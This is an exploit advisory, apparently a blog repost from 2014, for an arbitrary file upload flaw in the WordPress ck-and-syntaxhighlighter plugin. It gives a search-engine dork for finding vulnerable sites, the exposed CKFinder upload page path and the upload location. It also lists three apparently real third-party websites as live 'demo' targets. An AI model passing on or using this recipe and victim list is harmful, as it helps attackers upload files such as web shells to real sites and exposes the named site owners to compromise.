WordPress CK-And-SyntaxHighLighter Arbitrary File Upload Vuln

[+] Title: Wordpress ck-and-syntaxhighlighter Plugin RFU vulnerability
[+] Date: 2014-08-16
[+] Author: Hekt0r
[+] Tested on: Windows7 & Kali Linux
[+] Vendor Homepage: http://wordpress.org/
[+] Software Link: http://wordpress.org/plugins/ck-and-syntaxhighlighter/
[+] Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/
### POC:
http://localhost/wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
[+] File Uploaded:
http://localhost/wordpress/wp-content/uploads/ckfinder/files/file.txt
### Demo:
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://blog.itacm.cn/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
### Credits:
[+] Special Thanks: ICL  [+] iransec.net

// Informasi yang terkandung dalam publikasi ini adalah _+_+_+_
// disediakan "apa adanya" tanpa jaminan atau jaminan kebugaran _+_+_

Posted by Unknown on Saturday, August 16, 2014 - Rating: 4.5

Title : WordPress CK-And-SyntaxHighLighter Arbitrary File Upload Vuln
Description : [+] Title: Wordpress ck-and-syntaxhighlighter Plugin RFU vulnerability [+] Date: 2014-08-16 [+] Author: Hekt0r [+] Tested on: Windows...

Share to

Facebook Google+ Twitter